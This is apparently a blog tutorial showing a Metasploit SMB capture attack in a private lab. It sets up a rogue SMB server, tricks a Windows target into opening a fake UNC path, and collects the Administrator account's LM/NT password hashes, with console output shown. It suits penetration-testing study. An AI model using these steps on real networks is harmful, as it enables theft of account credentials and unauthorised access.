Local Host: 192.168.1.252/24 (TEST-BT4)
Target Host: 192.168.1.50/24 (LON-CL1)
Target Host: 192.168.1.50/24 (LON-CL1)
Step 1: Search for smb pattern
Code:
msf > search smb
Step 2: Use SMB Auxiliary module to capture hashes
Code:
msf > use server/capture/smb msf auxiliary(smb) > show options sniff.. msf auxiliary(smb) > set PWFILE /tmp/captured_hashes.txt msf auxiliary(smb) > set SRVHOST 192.168.1.252 msf auxiliary(smb) > run
Step 3: From the target machine, connect to our machine by using:
Code:
\\192.168.1.252\shared\xxx.jpg
Note: \shared\xxx.jpg is just a fake link (doesn’t exist).
Step 4: Switch to our machine and check if you’ve got the hashes captured
Code:
msf auxiliary(smb) > [*] Captured 192.168.1.50:1038 LON-CL1\Administrator LMHASH:24c9f38ec487472158851be047f9bd66ee5ef6eb6ff6e04d NTHASH:e52d81bf661f3699cfa4b631aead9ec78416dc8bce17dfd4 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
Press Ctrl-C to exit from msf console.
To display our captured hashes, change to /tmp directory:
Code:
root@bt:/pentest/exploits/framework3# cd /tmp root@bt:/tmp# cat captured_hashes.txt
No comments:
Post a Comment